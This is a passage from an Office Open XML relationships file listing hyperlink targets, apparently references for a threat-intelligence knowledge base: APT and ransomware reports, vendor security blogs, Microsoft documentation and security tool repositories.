TargetMode="External"/><Relationship Id="rId1630" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/" TargetMode="External"/><Relationship Id="rId2919" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/" TargetMode="External"/><Relationship Id="rId3083" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://taomm.org/vol1/pdfs.html" TargetMode="External"/><Relationship Id="rId1728" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/cc732643.aspx" TargetMode="External"/><Relationship Id="rId1935" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project" TargetMode="External"/><Relationship Id="rId2197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667" TargetMode="External"/><Relationship Id="rId3010" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ise.io/casestudies/password-manager-hacking/" TargetMode="External"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://auth0.com/docs/tokens/access-tokens" TargetMode="External"/><Relationship Id="rId376" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisco.com/c/en/us/td/docs/routers/crs/software/crs_r5-1/interfaces/configuration/guide/hc51xcrsbook/hc51span.html" TargetMode="External"/><Relationship Id="rId583" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805" TargetMode="External"/><Relationship Id="rId790" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf" TargetMode="External"/><Relationship Id="rId2057" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proofpoint.com/us/blog/threat-insight/geofenced-netwire-campaigns" TargetMode="External"/><Relationship Id="rId2264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/research/threat-profiles/cobalt-gypsy" TargetMode="External"/><Relationship Id="rId2471" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://labs.ft.com/2013/05/a-sobering-day/?mhq5j=e6" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://401trg.github.io/pages/burning-umbrella.html" TargetMode="External"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf" TargetMode="External"/><Relationship Id="rId443" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.crowdstrike.com/blog/mo-shells-mo-problems-deep-panda-web-shells/" TargetMode="External"/><Relationship Id="rId650" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.2016_TLP_White.pdf" TargetMode="External"/><Relationship Id="rId888" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html" TargetMode="External"/><Relationship Id="rId1073" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/storage/docs/best-practices" TargetMode="External"/><Relationship Id="rId1280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kubernetes.io/docs/tasks/debug-application-cluster/get-shell-running-container/" TargetMode="External"/><Relationship Id="rId2124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redcanary.com/blog/stopping-emotet-before-it-moves-laterally/" TargetMode="External"/><Relationship Id="rId2331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sixdub.net/?p=367" TargetMode="External"/><Relationship Id="rId2569" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://datatracker.ietf.org/doc/html/rfc6143" TargetMode="External"/><Relationship Id="rId2776" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pan-unit42.github.io/playbook_viewer/" TargetMode="External"/><Relationship Id="rId2983" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/wp-content/uploads/200x/white-papers/osx_flashback.pdf" TargetMode="External"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cadosecurity.com/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials/" TargetMode="External"/><Relationship Id="rId748" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/" TargetMode="External"/><Relationship Id="rId955" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gcn.com/cybersecurity/2011/06/rsa-confirms-its-tokens-used-in-lockheed-hack/282818/" TargetMode="External"/><Relationship Id="rId1140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20171017072306/https:/icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/" TargetMode="External"/><Relationship Id="rId1378" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/en-us/library/aa394582.aspx" TargetMode="External"/><Relationship Id="rId1585" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata" TargetMode="External"/><Relationship Id="rId1792" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/windows/security/identity-protection/user-account-control/how-user-account-control-works" TargetMode="External"/><Relationship Id="rId2429" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt" TargetMode="External"/><Relationship Id="rId2636" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/BKDR_URSNIF.SM?_ga=2.129468940.1462021705.1559742358-1202584019.1549394279" TargetMode="External"/><Relationship Id="rId2843" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://download.ahnlab.com/global/brochure/%5bAnalysis%5dAndariel_Group.pdf" TargetMode="External"/><Relationship Id="rId510" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cybereason.com/blog/medusalocker-ransomware" TargetMode="External"/><Relationship Id="rId608" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.didierstevens.com/2009/11/22/quickpost-selectmyparent-or-playing-with-the-windows-process-tree/" TargetMode="External"/><Relationship Id="rId815" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html" TargetMode="External"/><Relationship Id="rId1238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/sodin-ransomware/91473/" TargetMode="External"/><Relationship Id="rId1445" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/content/dam/collateral/en/wp-m-unc2452.pdf" TargetMode="External"/><Relationship Id="rId1652" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525696(v=vs.90)" TargetMode="External"/><Relationship Id="rId1000" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dafthack/MailSniper" TargetMode="External"/><Relationship Id="rId1305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/" TargetMode="External"/><Relationship Id="rId1957" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf" TargetMode="External"/><Relationship Id="rId2703" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.gov.uk/government/publications/russias-fsb-malign-cyber-activity-factsheet/russias-fsb-malign-activity-factsheet" TargetMode="External"/><Relationship Id="rId2910" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.wired.com/story/magecart-amazon-cloud-hacks/" TargetMode="External"/><Relationship Id="rId1512" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/powershell/module/exchange/mailboxes/add-mailboxpermission?view=exchange-ps" TargetMode="External"/><Relationship Id="rId1817" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/windows-defender-application-control" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://o365blog.com/aadinternals" TargetMode="External"/><Relationship Id="rId398" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf" TargetMode="External"/><Relationship Id="rId2079" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20190625182633if_/https:/ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/" TargetMode="External"/><Relationship Id="rId3032" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-alphv-rust-ransomware" TargetMode="External"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/" TargetMode="External"/><Relationship Id="rId2286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/research/mcmd-malware-analysis" TargetMode="External"/><Relationship Id="rId2493" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2018/02/olympic-destroyer.html" TargetMode="External"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf" TargetMode="External"/><Relationship Id="rId465" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/wizard-spider-adversary-update/" TargetMode="External"/><Relationship Id="rId672" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf" TargetMode="External"/><Relationship Id="rId1095" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf" TargetMode="External"/><Relationship Id="rId2146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/" TargetMode="External"/><Relationship Id="rId2353" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sophosnews.files.wordpress.com/2012/04/zeroaccess2.pdf" TargetMode="External"/><Relationship Id="rId2560" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/cc785125.aspx" TargetMode="External"/><Relationship Id="rId2798" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/clop-ransomware/" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies" TargetMode="External"/><Relationship Id="rId325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/" TargetMode="External"/><Relationship Id="rId532" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.cylance.com/puttering-into-the-future" TargetMode="External"/><Relationship Id="rId977" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos" TargetMode="External"/><Relationship Id="rId1162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.intel.com/content/dam/www/public/us/en/documents/white-papers/security-technologies-4th-gen-core-retail-paper.pdf" TargetMode="External"/><Relationship Id="rId2006" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/" TargetMode="External"/><Relationship Id="rId2213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign" TargetMode="External"/><Relationship Id="rId2420" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" TargetMode="External"/><Relationship Id="rId2658" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html" TargetMode="External"/><Relationship Id="rId2865" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Control-flow_integrity" TargetMode="External"/><Relationship Id="rId837" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1498163766.pdf" TargetMode="External"/><Relationship Id="rId1022" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SpiderLabs/Responder" TargetMode="External"/><Relationship Id="rId1467" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mcafee.com/enterprise/en-us/assets/reports/rp-cuba-ransomware.pdf" TargetMode="External"/><Relationship Id="rId1674" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview" TargetMode="External"/><Relationship Id="rId1881" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdf" TargetMode="External"/><Relationship Id="rId2518" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.technet.microsoft.com/askpfeplat/2016/04/18/the-importance-of-kb2871997-and-kb2928120-for-credential-protection/" TargetMode="External"/><Relationship Id="rId2725" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.us-cert.gov/ncas/alerts/TA17-181A" TargetMode="External"/><Relationship Id="rId2932" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat" TargetMode="External"/><Relationship Id="rId904" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html" TargetMode="External"/><Relationship Id="rId1327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://letsencrypt.org/docs/faq/" TargetMode="External"/><Relationship Id="rId1534" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/windows/desktop/ms681951.aspx" TargetMode="External"/><Relationship Id="rId1741" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771525(v=ws.11)" TargetMode="External"/><Relationship Id="rId1979" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/" TargetMode="External"/><Relationship Id="rId1601" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs" TargetMode="External"/><Relationship Id="rId1839" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/huntergregal/mimipenguin" TargetMode="External"/><Relationship Id="rId3054" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.linkedin.com/pulse/getting-attacker-ip-address-from-malicious-linux-job-craig-rowland/" TargetMode="External"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://o365blog.com/post/federation-vulnerability/" TargetMode="External"/><Relationship Id="rId1906" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/" TargetMode="External"/><Relationship Id="rId487" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cyberark.com/resources/blog/cyberark-labs-from-safe-mode-to-domain-compromise" TargetMode="External"/><Relationship Id="rId694" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_Operation_Interception.pdf" TargetMode="External"/><Relationship Id="rId2070" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader" TargetMode="External"/><Relationship Id="rId2168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sentinelone.com/blog/how-malware-persists-on-macos/" TargetMode="External"/><Relationship Id="rId2375" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/" TargetMode="External"/><Relationship Id="rId347" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ciberseguridad.blog/decodificando-ficheros-rtf-maliciosos/" TargetMode="External"/><Relationship Id="rId999" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/wdormann/fca29e0dcda8b5c0472e73e10c78c3e7" TargetMode="External"/><Relationship Id="rId1184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/james_inthe_box/status/1150495335812177920" TargetMode="External"/><Relationship Id="rId2028" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://info.phishlabs.com/blog/silent-librarian-more-to-the-story-of-the-iranian-mabna-institute-indictment" TargetMode="External"/><Relationship Id="rId2582" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop" TargetMode="External"/><Relationship Id="rId2887" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.winosbite.com/verclsid-exe/" TargetMode="External"/><Relationship Id="rId554" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/" TargetMode="External"/><Relationship Id="rId761" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/" TargetMode="External"/><Relationship Id="rId859" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20180808125108/https:/www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html" TargetMode="External"/><Relationship Id="rId1391" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/" TargetMode="External"/><Relationship Id="rId1489" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://elis531989.medium.com/the-chronicles-of-bumblebee-the-hook-the-bee-and-the-trickbot-connection-686379311056" TargetMode="External"/><Relationship Id="rId1696" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/library/cc835085.aspx" TargetMode="External"/><Relationship Id="rId2235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/my-name-is-dtrack/93338/" TargetMode="External"/><Relationship Id="rId2442" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets" TargetMode="External"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/the-naikon-apt/69953/" TargetMode="External"/><Relationship Id="rId414" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cobaltstrike.com/downloads/reports/tacticstechniquesandprocedures.pdf" TargetMode="External"/><Relationship Id="rId621" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.docker.com/storage/bind-mounts/" TargetMode="External"/><Relationship Id="rId1044" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py" TargetMode="External"/><Relationship Id="rId1251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/games-are-over/70991/" TargetMode="External"/><Relationship Id="rId1349" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/documentation/devicemanagement/loginwindowscripts" TargetMode="External"/><Relationship Id="rId2302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sensepost.com/blog/2017/outlook-forms-and-shells/" TargetMode="External"/><Relationship Id="rId2747" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/" TargetMode="External"/><Relationship Id="rId2954" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://go.kaspersky.com/rs/802-IJN-240/images/TR_BlackCat_Report.pdf" TargetMode="External"/><Relationship Id="rId719" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/wp-content/uploads/2022/02/eset_threat_report_t32021.pdf" TargetMode="External"/><Relationship Id="rId926" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop" TargetMode="External"/><Relationship Id="rId1111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/" TargetMode="External"/><Relationship Id="rId1556" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/azure/storage/common/storage-security-guide" TargetMode="External"/><Relationship Id="rId1763" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications" TargetMode="External"/><Relationship Id="rId1970" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://man7.org/linux/man-pages/man2/ptrace.2.html" TargetMode="External"/><Relationship Id="rId2607" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/en_us/research/19/j/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops.html" TargetMode="External"/><Relationship Id="rId2814" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html" TargetMode="External"/><Relationship Id="rId1209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/recent-cloud-atlas-activity/92016/" TargetMode="External"/><Relationship Id="rId1416" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/" TargetMode="External"/><Relationship Id="rId1623" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/system.diagnostics.eventlog.clear.aspx" TargetMode="External"/><Relationship Id="rId1830" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult" TargetMode="External"/><Relationship Id="rId3076" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html" TargetMode="External"/><Relationship Id="rId1928" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf" TargetMode="External"/><Relationship Id="rId2092" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe" TargetMode="External"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-cert.cisa.gov/ncas/alerts/aa21-200a" TargetMode="External"/><Relationship Id="rId2397" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime" TargetMode="External"/><Relationship Id="rId3003" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20160503234007/https:/www.isightpartners.com/2014/10/cve-2014-4114/" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://discussions.apple.com/thread/3991574" TargetMode="External"/><Relationship Id="rId369" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.cisco.com/security/center/resources/integrity_assurance.html" TargetMode="External"/><Relationship Id="rId576" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://threatpost.com/hacker-puts-hosting-service-code-spaces-out-of-business/106761/" TargetMode="External"/><Relationship Id="rId783" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://labs.f-secure.com/assets/BlogFiles/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf" TargetMode="External"/><Relationship Id="rId990" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/wdormann/732bb88d9b5dd5a66c9f1e1498f31a1b" TargetMode="External"/><Relationship Id="rId2257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems" TargetMode="External"/><Relationship Id="rId2464" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 